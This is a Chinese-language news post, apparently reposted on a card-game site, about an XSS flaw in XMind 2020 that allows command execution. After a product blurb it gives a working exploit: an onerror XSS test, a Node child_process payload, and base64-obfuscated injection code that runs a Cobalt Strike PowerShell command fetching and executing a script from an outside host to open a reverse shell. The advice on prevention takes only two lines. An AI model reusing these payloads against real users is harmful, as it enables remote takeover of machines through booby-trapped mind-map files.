瓦力棋牌(中国)

    新闻动态

    News information

    XMind 2020爆发 XSS漏洞 安全人员建议这样做!

    <<返回

    2021年05月11日 19:05

    XMind 2021 即将正式发布,这款全新的思维导图和头脑风暴软件,2021版优化了结构采用全新设计、主要新增了演说模式、给予多种不同结构和配色风格供选择、增加了更多主题形状、支持修改多种图片样式。

     

    XMind 是一款专业的全球领先的商业思维导图软件,在国内使用广泛,拥有强大的功能、包括思维管理、商务演示、与办公软件协同工作等功能。它采用全球先进的Eclipse RCP软件架构,是集思维导图与头脑风暴于一体的可视化思考工具,能用来捕捉想法、理清思路、管理复杂信息并促进团队协作。XMind思维导图软件曾被著名互联网媒体Lifehacker评选为“最佳头脑风暴和思维导图工具”及”最受欢迎的思维导图软件”。

     

    XMind ZEN 是 XMind 公司在思杰马克丁取消代理后开发的一款全新的思维导图软件,这款思维导图软件和 XMind8 在功能上是差不多的,也是完全兼容的,只不过是主界面上变化比较大,XMind ZEN 比 XMind 8 更加美观。

     

    XMind ZEN 采用了全新 SNOWBRUSH 2.0 绘图引擎,官方宣称此引擎经过3年的开发,他们 100% 重写了思维导图的引擎,着眼在未来的黑科技上,提升了思维导图的展示效果,丰富了绘图的元素。

     

    下载地址

    XMind 2021 v11.0.0 Beta 1 x64 官方版 for Windows

    http://dl2.xmind.cn/XMind-2021-for-Windows-64bit-11.0.0-Beta1-202105061920.exe

    image001.jpg

     

     

    XMind是一种功能齐全的思维导图和头脑风暴工具,旨在产生想法,激发创造力,并在工作和生活中带来效率。数以百万计的用户们喜欢它。

    2021年5月10日, Xmind 2020存在XSS漏洞,攻击者可以借助该漏洞实现命令执行,在实际环境中借助钓鱼攻击可能造成更严重的危害。

     

    image003.jpg

    image005.jpg

     

    漏洞利用方式:

    选择事件型XSS需要附带onerror事件,比如img、audio等。

     

    测试 弹窗代码:

    <img src=x onerror=alert(1)>

    image007.jpg

     

    构造命令执行payload

     

    require('child_process').exec('ipconfig /all',(error, stdout, stderr)=>{

        alert(`stdout: ${stdout}`);

      });

     

    最终利用代码:

     

    <img src=# onerror='eval(new 

    Buffer(`cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ2lwY29uZmlnIC9hbGwnLChlcnJvciwgc3Rkb3V0LCBzdGRlcnIp

    PT57CiAgICBhbGVydChgc3Rkb3V0OiAke3N0ZG91dH1gKTsKICB9KTs=`,`base64`).toString())'>

     

    image010.jpg

     

    反弹shell命令

     

    CS生成powershell脚本

     

    image011.jpg

     

    Cobatstrike 生成 powershell命令

    powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://172.22.32.25:8080/a'))"

      

    原始代码:

    require('child_process').exec('powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring

    (\'http:// 172.22.32.25:8080/a'\'))"',(error, stdout, stderr)=>{

        alert(`stdout: ${stdout}`);

      });

     

    代码base64加密:

    cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ3Bvd2Vyc2hlbGwuZXhlIC1ub3AgLXcgaGlkZGVuIC1jICJJRVggKChuZXctb

    2JqZWN0IG5ldC53ZWJjbGllbnQpLmRvd25sb2Fkc3RyaW5nKFwnaHR0cDovLyAxNzIuMjIuMzIuMjU6ODA4MC9hJ1wnKSkiJywo

    ZXJyb3IsIHN0ZG91dCwgc3RkZXJyKT0+ewogICAgYWxlcnQoYHN0ZG91dDogJHtzdGRvdXR9YCk7CiAgfSk7Cg==

    image013.jpg

    最终插入代码:

    <img src=# onerror='eval(new 

    Buffer(`cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ3Bvd2Vyc2hlbGwuZXhlIC1ub3AgLXcgaGlkZGVuIC1jICJJRVggK

    ChuZXctb2JqZWN0IG5ldC53ZWJjbGllbnQpLmRvd25sb2Fkc3RyaW5nKFwnaHR0cDovLyAxNzIuMjIuMzIuMjU6ODA4MC9hJ

    1wnKSkiJywoZXJyb3IsIHN0ZG91dCwgc3RkZXJyKT0+ewogICAgYWxlcnQoYHN0ZG91dDogJHtzdGRvdXR9YCk7CiAgfSk7Cg

    ==`,`base64`).toString())'>

     

    image016.jpg

     

     

    预防:   

    1、 升级到最新版本

    2、 谨慎打开Xmind